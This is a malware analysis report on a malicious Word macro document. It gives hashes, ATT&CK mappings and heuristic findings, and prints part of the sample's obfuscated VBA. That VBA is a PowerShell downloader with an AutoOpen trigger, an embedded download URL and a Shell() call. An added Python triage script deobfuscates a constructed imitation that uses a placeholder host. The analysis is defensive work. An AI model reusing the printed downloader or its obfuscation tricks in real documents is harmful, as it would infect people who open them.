Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8714fc9545f75320…

MALICIOUS

Office (OLE)

Size: 143.5 KB
Created: 2017-12-05 20:23:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: 8507ac71d54b5fcdcd211c792a7af774
SHA-1: 67e83c6c77069bb9df91b778759e83de376d867e
SHA-256: 8714fc9545f75320ff375d6e807691ef327194a8942ac8695ceb0a18cacce1b3
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document carrying a VBA project. An AutoOpen procedure supplies the auto-execution trigger, and the macro body assembles its command from many small pieces: decoy Array() calls that concatenate random-looking strings and do nothing useful, and Mid() calls that carve a fixed-offset substring out of longer, junk-padded literals. The carved pieces are themselves interrupted by filler tokens (zXT+zXT, gJr+gJr and '+' in the preview) that the macro presumably strips in the part of the source not shown here. Read past those tokens, the visible fragments contain PowerShell cmdlet names and idioms (new-object random, env:public, DownloadFile, Invoke-Item, a try/catch that writes the exception message), which is the shape of a downloader that fetches a second-stage executable to a local path and runs it. The finished string is handed to Shell(). The combination of an AutoOpen trigger, a Shell() sink and heavy string obfuscation is what drives the malicious verdict; the only URL the extractor reports separately is a benign XML namespace, so the actual download location is not confirmed by this static pass and would need full deobfuscation or dynamic analysis.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscation-6394109-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    The document contains VBA macro code. On its own this is only a prerequisite for the stronger findings below.
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The VBA source calls Shell(), the sink through which the assembled command string is handed to the operating system.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    An AutoOpen procedure is present, so the macro runs as soon as the document is opened with macros enabled; no further user action is required.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This check exists for p-code-only documents and for cases where source extraction fails; here the decoded source was recovered as well, so the finding corroborates the two source-level findings above.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic's generic description states that no modern VBA project was recovered, but the Extracted artifacts section below shows that a VBA project (macros.bas) was extracted, so treat this as further evidence of an auto-execution surface rather than as a separate vector. It is not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label records which channel (macro, JS, link annotation, document body, ...) reached it.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that Office writes into ordinary documents, not an address the sample contacts; the downloader's real destination sits inside the obfuscated macro strings and is not reported here as an extracted URL.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  50156 bytes
SHA-256: b3b082f538c10dcb27a912351a9df8f9b8d78c5d8e87a559db73e237d08654c1

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SXJzpjlQVKiOD"
Function FFVjzIwvtMPzG()
sippEWSB = Array("MpHmWDNmpnD" + "rCilAIR" + "cjQROzJsQzKC" + "fHUkiYMcCj" + "GFUwNdFMl")
kJLjDZ = Mid("2dBXgJr+gJrTm;9zXT'+'+zXTTzXT+zXT7zXT'+'+zXTbczXT+zXTd = WfDhttpzXTgJr+gJr+zXT:gJr+gJr//www.rentagJr+gJrlhtmamz'+'XT+zXTamia.czXT+zXTomzXT+zXT/nzXT+zXTPmD/zXT+zXT'+',zXT+wLpPPFS8wiBPEIbYJ2rE0WzXirO", 4, 167)
kBIjJnu = Array("uTIGzVtdW" + "hcRFSbZ" + "HofFfFBH" + "KrVvQqpWCJ" + "MwwOFVCh")
zRWcov = Array("zdZpYXtVVpcAkM" + "OARkEKZCBLIiNf" + "uwQajiuuKBTGh" + "mFVIBwcnchkZa" + "iPsjqhuijK")
TNPFrjhsFRc = Array("ZwnrNGjc" + "aBobcnJYnMsSn" + "FdKAVpEYj" + "TUzspDDozctI" + "LfNKzZlwtlfh")
EHarHcV = Mid("6HreazXT+zXTkzXT+zXT;}catch{write'+'-hzXT+zXTo'+'st 9T7_.EzXT+zXTxceptiozXT+zXTnzXT+zXT.MeszXT+zXTsagzXT+zXTe;zXT+zXT}'+'}zXT)-CrEPLACEg08ttwO6WNvIWilkUYShhc9Efi0adfnl", 3, 134)
CzScZncnrcN = Array("QUFHilDrKOF" + "WMjLHWjqGDWQu" + "mQzzIVKd" + "iWftwjhQJYcV" + "KWmHAUYMzp")
YkkOGOM = Array("CFOnpCUHI" + "pRjjIDTK" + "zwzVIfEwvk" + "iRKbAzaMnq" + "ZCXYtQpdsaaGk")
XNQbSWk = Array("DYbwGmWVwv" + "ijRMjwmz" + "CUvuTcAj" + "fCzdfEnwMqbwiG" + "GYlfoGKUVFRic")
zHObbVUvKQp = Mid("kaq9AVkS2KoT+zXgJr+gJrT6jnM4", 12, 12)
CwhtVmOlS = Array("DkGHkEZWi" + "XGHjKdGXiJ" + "wwjlnISszH" + "aIzNUECm" + "DUzAmIGSP")
IwiNavc = Array("dilmWRsHBDNZ" + "mvVLTOEnuqUu" + "UiiXOVKRjMpLM" + "wwXhSPYXYzuzU" + "tinRsdwKdd")
jzNcl = Array("ZqarBLI" + "XiSTdRcdMbUL" + "ZHVTptIGarlW" + "SjaQUiKNTLwli" + "njvYhnSA")
rbIod = Mid("icaYoDjU2264cotinsPJqXPK62iYcb2JwDJr+gJrT7envzXT+zXT:publiczXT+zXT +zXT+'+'zXT WfzXT+zXTDczXT+zgJr+gJrXTwYWfD + 9zXT+zXTTzXT+zXT7karapazXjH", 35, 103)
DwKfVro = Array("sOQCjjAGaGoWJ" + "fUzJicQ" + "nYBYXTj" + "nVtraBIVpTuqu" + "ELiPMIzBw")
oZpjjNtJp = Array("FYLRzawqjzjz" + "DwHqBUGvWiGhV" + "fTEjaSzVsI" + "KmWVRowN" + "fzRrmztoipEkiD")
ZJMVQPfAiwO = Array("CMlTORfJj" + "BuAJzfbPUSnbtl" + "zBOOvJHGMiVS" + "aJJWRCsXNmP" + "nNaicbTAjPP")
TQIHp = Mid("Ujfnmvln9z67vTent;9T7zXT+zXTgJ'+'r+gJrnsadasdzXT+zXT = zXT+zXTnew-ozXT+zXTbjzXT+zXTeczXT+gJr+gJrzXTt rgJr+gJrandozXT+zgJr+gJraYlvWFtvCl", 14, 112)
ZjGioKDzikV = Array("WcNJhtiEw" + "qikZFuITbrj" + "NwdYKmC" + "cjiEwpa" + "jAzuSNvPJOduw")
hlPWZzKfj = Array("unluoofiM" + "oLIQJrtMmOzjIv" + "ckCCSuLtsciQ" + "jYGkRqYPWLRbGX" + "BSKipNMEcbu")
ndljQBvaYB = Array("vGfrBiiva" + "XfAKFtiFvcbUz" + "wZzcSzV" + "mIoRpmHoKz" + "PwGABpWOwz")
oOXKYKzIfYn = Mid("UIK6zmADaDFSoKpIIQa7DUkfoZNzXT9T7gJr+gJrzXT+zXTbcd)zXT+gJr+gJrzXT{tzX'+'T+zXTry{9T7frgJr+gJrzX'+'T+zXTanc.DownloadFzXT+zgJr+gJrXTilezXT+zXT(9zXT+zgJr+'+'gJr'+'XTT7abzXT+zXTcz'+'XT+zXT.ToSzXT+zXTtzXT+zXTring(),zXT+zXT 9TRvvwmw2F", 28, 192)
LoaTPK = Array("dSQofav" + "NIOSRXRFYla" + "XisZRzak" + "UiJXpvzGWm" + "LuPsEsN")
jJlUjEzXRrq = Array("qaGdtbiBcaUw" + "rVoErzGRbzkDr" + "wnwkWbBROL" + "tjFIXwvz" + "JjBRXBqSP")
RPDUbwuQwv = Array("cBdcmJYWn" + "GofPNvq" + "JjtOFokvYrJ" + "QVoDSpcV" + "MKCkTSvKuzfru")
nISwRd = Mid("UQzwHGYlAnRizskEqMkrvr2FnNHiz'+'XT+zXT7o2P5", 29, 11)
lCfZqTvaS = Array("WZBDkOjqzXr" + "HcswRAJEBoD" + "PSmiNVliCkp" + "scVurFwcViYY" + "YkpJKbhVWn")
GofwciFqiiT = Array("GZNwprrkj" + "fpkzcwXTU" + "wWqdlVokiudQ" + "IidEtniwbd" + "EiiwizZMWJQki")
bkcHZO = Array("ZuNNuzA" + "jvhNRbYlMpvFOI" + "mRnvbmTEULh" + "BSTcwrkbJzw" + "wrhJRoOoQQav")
jwlDbTm = Mid("zjJKs + WfD.zXT+zXTexeWzXT+zXTfD;forez'+'XT+zXTach(9T7aEi1AzvLtUIjsK", 5, 51)
ktiGwAEiXk = Array("LTCGGlkPTcRw" + "djpmUsBYGnsCj" + "RtMrzvTiTb" + "VsEpLFfkEwfhW" + "rjLEjKEZQSWHkT")
OhFci = Array("DYKQqMCj" + "XTsNzNijUnUAzk" + "JmfwtOl" + "XVtTZLSmuDCUO" + "DpAKkvmaG")
XhfrIpnvh = Array("YPOUqIGC" + "WYcRPlQnvllYjE" + "XFqiOwSwHdGDpt" + "jFTmPXiTq" + "zFqPXlrLSz")
rRihwrlLck = Mid("ul8tHMjr6Ys6tH84LhzXT+zXTuazXT+zXTs);IzXT+zXTnzXgJr+gJrT+zXTvogJr+gJrke-ItezXTgJr+gJr+zXTmzXT+zXT(9T7h'+'zXT+Xv5aIQczjji9DIrJM
... (truncated)
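To show how the carving in the preview above works end to end, here is an added Python triage script. It is my example, not the sandbox's code and not the sample's own macro. It applies the same two checks that the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL findings rely on, emulates VBA's 1-based Mid() on every string literal it finds, strips the filler tokens, and finally maps two placeholders back to characters. The filler-token list, the placeholder mapping (9T7 to $, WfD to a single quote) and the embedded sample macro are my assumptions modelled on the fragments visible above; the real macro's Replace() logic is in the truncated part of the dump and is not shown on this page.

```python
"""Triage a VBA macro dump the way the report's heuristics do, then recover the
string fragments hidden behind Mid() carving and filler tokens.

Added example for this report; not the sandbox's own code. The sample macro
below is constructed to mirror the preview, it is not the real source."""
import re

# Auto-exec entry points and execution/download primitives, mirroring what the
# OLE_VBA_AUTOOPEN and OLE_VBA_SHELL findings key on.
AUTOEXEC = re.compile(
    r"\b(AutoOpen|AutoExec|AutoClose|Document_Open|Workbook_Open)\b", re.I)
EXEC = re.compile(
    r"\b(Shell|CreateObject|ShellExecute|URLDownloadToFile)\b", re.I)

# Mid("literal", start, length); VBA doubles embedded quotes ("").
MID_CALL = re.compile(
    r'Mid\(\s*"((?:[^"]|"")*)"\s*,\s*(\d+)\s*,\s*(\d+)\s*\)', re.I)

# ASSUMPTION: filler tokens inferred from the fragments in the preview. The
# macro's own Replace() calls sit in the truncated part of the dump.
FILLERS = ("'+'", "zXT+zXT", "gJr+gJr")

# ASSUMPTION (analyst hypothesis, not stated on the page): placeholders for
# characters the author avoided writing literally.
PLACEHOLDERS = {"9T7": "$", "WfD": "'"}

# Constructed sample: two Mid() literals padded with junk on both sides, the
# decoy Array() lines, an AutoOpen entry point and the Shell() sink.
SAMPLE_VBA = r'''
Attribute VB_Name = "SXJzpjlQVKiOD"
Sub AutoOpen()
    FFVjzIwvtMPzG
End Sub
Function FFVjzIwvtMPzG()
    sippEWSB = Array("MpHmWDNmpnD" + "rCilAIR" + "cjQROzJsQzKC")
    kJLjDZ = Mid("ab9T7abc = WfDhttp://gJr+gJrwww.exzXT'+'+zXTample.test/WfD;QQQ", 3, 57)
    kBIjJnu = Array("uTIGzVtdW" + "hcRFSbZ" + "HofFfFBH")
    rbIod = Mid("xyzwtry{9T7w.DowngJr+gJrloadFile(9T7u,9T7p);InvokezXT+zXT-Item 9T7p}catch{}K", 5, 71)
    cmd = kJLjDZ + rbIod
    x = Shell(cmd, 0)
End Function
'''


def vba_mid(s, start, length):
    """Emulate VBA Mid(): 1-based start; a start past the end yields ""."""
    if start < 1 or length < 0:
        raise ValueError("Mid: start must be >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


def carve_fragments(src):
    """Return what each Mid() call yields, in source order, without the junk
    padding placed around the useful substring."""
    frags = []
    for lit, start, length in MID_CALL.findall(src):
        frags.append(vba_mid(lit.replace('""', '"'), int(start), int(length)))
    return frags


def strip_fillers(s, fillers=FILLERS):
    """Delete filler tokens until the string stops changing; the loop matters
    because one filler is spliced inside another (zXT'+'+zXT)."""
    prev = None
    while prev != s:
        prev = s
        for tok in fillers:
            s = s.replace(tok, "")
    return s


def decode_placeholders(s, mapping=PLACEHOLDERS):
    """Map the assumed placeholders back to the characters they stand for."""
    for key, val in mapping.items():
        s = s.replace(key, val)
    return s


def triage(src):
    """Flag auto-exec plus execution tokens and surface the carved fragments."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(src)})
    exec_tokens = sorted({m.group(1) for m in EXEC.finditer(src)})
    fragments = [strip_fillers(f) for f in carve_fragments(src)]
    return {
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        "fragments": fragments,
        "decoded": [decode_placeholders(f) for f in fragments],
        "verdict": "suspicious" if autoexec and exec_tokens else "review",
    }


if __name__ == "__main__":
    for key, val in triage(SAMPLE_VBA).items():
        print(f"{key}: {val}")
```

Run it against the real macros.bas by reading the file into triage() instead of SAMPLE_VBA; the Mid() emulation and the auto-exec/sink checks need no changes, but FILLERS and PLACEHOLDERS should be adjusted to whatever the macro's own Replace() calls turn out to remove once the full source is inspected.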